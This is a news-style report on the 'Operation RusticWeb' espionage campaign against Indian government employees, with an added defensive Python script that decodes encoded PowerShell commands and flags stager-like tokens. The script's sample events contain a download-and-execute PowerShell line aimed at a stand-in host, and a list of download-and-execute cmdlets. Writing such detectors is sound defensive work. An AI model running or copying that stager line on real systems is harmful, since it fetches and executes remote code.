Seqrite has discovered “Operation RusticWeb,” a highly advanced cyber-espionage effort that was painstakingly planned to target various Indian government employees. The experts at Seqrite Labs, the cybersecurity research and response branch of Quick Heal and the biggest malware detection facility in India, uncovered an unsettling shift in the strategies used by threat actors while analysing this cyber-espionage campaign.
Seqrite Labs’ APT Team has been carefully delving into the complexities of Operation RusticWeb since October 2023. They have discovered a multidimensional methodology that blends state-of-the-art methods with novel programming languages. The campaign uses encrypted PowerShell instructions and malware built on the Rust platform, indicating a deliberate shift in strategy toward more sophisticated and devious ways to obtain private information.
The campaign is a phishing operation directed at government employees. Threat actors have used both compromised and look-alike domains to host malicious payloads and decoy files. The decoys have included IPR forms, hosted on domains that imitate esteemed institutions such as the Army Welfare Education Society (AWES). Other decoy files, used to lure victims into opening malicious content, contain presentations about Ministry of Defense projects and forms pertaining to the Defense Services Officers Provident Fund.
Rust-based payloads and encrypted PowerShell commands are used in Operation RusticWeb. By using a web-based service engine to exfiltrate confidential documents, the threat actors up the ante on their cyber-espionage strategies. Rust-based payloads played a major role in the first infection chain observed: a malicious shortcut file started a complex chain of events that resulted in the exfiltration of private information. The second infection chain, discovered in December, demonstrated the adaptability and sophistication of the threat actors by employing encrypted PowerShell commands to deliver malicious documents.
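One practical detection angle for the PowerShell stage described above is to inspect process-creation telemetry for encoded command lines and decode them before alerting. The script below is an added example written for this page, not code from Seqrite's report or from the campaign; it assumes the "encrypted PowerShell commands" take the common base64 `-EncodedCommand` (UTF-16LE) form, which the page itself does not state, and it works over constructed sample events rather than real telemetry from the operation.

```python
import base64
import re
from typing import Optional

# Every unambiguous prefix powershell.exe accepts for -EncodedCommand
# (-e, -en, -enc, ... -encodedcommand) plus the documented alias -ec.
# Longest-first so the regex alternation prefers the full spelling.
_PREFIXES = sorted({"encodedcommand"[:i] for i in range(1, 15)} | {"ec"},
                   key=len, reverse=True)
ENC_SWITCH = re.compile(
    r"(?i)(?:^|\s)-(?:" + "|".join(_PREFIXES) + r")\s+([A-Za-z0-9+/=]+)")

# Cmdlets and .NET members typical of download-and-execute stagers. Matching is
# word-bounded so e.g. "iex" does not fire inside an unrelated identifier.
SUSPICIOUS_TOKENS = ("invoke-expression", "iex", "net.webclient", "downloadstring",
                     "downloadfile", "invoke-webrequest", "start-process",
                     "frombase64string")
_TOKEN_RE = {t: re.compile(r"\b" + re.escape(t) + r"\b", re.I)
             for t in SUSPICIOUS_TOKENS}


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if there is none.

    PowerShell encodes the script as base64 over UTF-16LE bytes. Every
    candidate switch is tried, so a decoy '-enc notbase64' does not hide a
    real one later on the command line.
    """
    for m in ENC_SWITCH.finditer(cmdline):
        try:
            return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            continue
    return None


def suspicious_tokens(decoded: str) -> list:
    """List the stager-like tokens present in a decoded command, in a fixed order."""
    return [t for t, rx in _TOKEN_RE.items() if rx.search(decoded)]


def encode_ps(command: str) -> str:
    """Same transform as [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($cmd))."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


# Constructed sample process-creation events (hypothetical, not from the report).
STAGER_CMD = "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/stage')"
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
    {"parent": r"C:\Windows\explorer.exe",          # shortcut-launched, as in chain one
     "cmdline": "powershell.exe -nop -w hidden -enc " + encode_ps(STAGER_CMD)},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "powershell -EncodedCommand " + encode_ps("Get-Date")},
]


def triage(events: list) -> list:
    """Decode every encoded command in the events and attach its suspicious tokens.

    Each finding carries the event index, parent image, decoded script and the
    matched tokens; an empty token list means "encoded but nothing stager-like".
    """
    findings = []
    for i, ev in enumerate(events):
        decoded = decode_encoded_command(ev["cmdline"])
        if decoded is None:
            continue
        findings.append({"index": i, "parent": ev["parent"],
                         "decoded": decoded, "tokens": suspicious_tokens(decoded)})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        verdict = "ALERT" if f["tokens"] else "review"
        print(f"[{verdict}] event {f['index']} parent={f['parent']}")
        print(f"    decoded: {f['decoded']}")
        print(f"    tokens:  {f['tokens']}")
```

Decoding first and then scoring the plaintext is the point: a rule that fires on every `-enc` produces noise from legitimate automation (the `Get-Date` event), while a rule that only looks at the raw command line never sees the download-and-execute pattern at all. Sysmon Event ID 1 or Windows Security 4688 with command-line auditing enabled provides the `cmdline` and parent fields this assumes.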
Operation RusticWeb’s final payload is Rust-based malware that steals data. This spyware gains considerable reconnaissance capability by gathering system information in addition to stealing files. The threat actors bypass the traditional use of dedicated command-and-control servers by exfiltrating data through an anonymous public file-sharing engine called OshiUpload.
The operation serves as an excellent illustration of how threat actors are moving away from traditional cyberattack techniques and into more modern programming languages like Golang, Rust, and Nim, which offer cross-compatibility and make detection more challenging. The campaign highlights similarities with APT groups associated with Pakistan, namely Transparent Tribe (APT36) and SideCopy, suggesting the potential for a more extensive and well-planned cyber-espionage operation.
Seqrite stresses the need for strong cybersecurity measures and calls for increased prudence in the context of quickly changing cyberthreats. The firm is still dedicated to leading cybersecurity research and offering vital insights to protect people, businesses, and governments from ever-changing cyberthreats.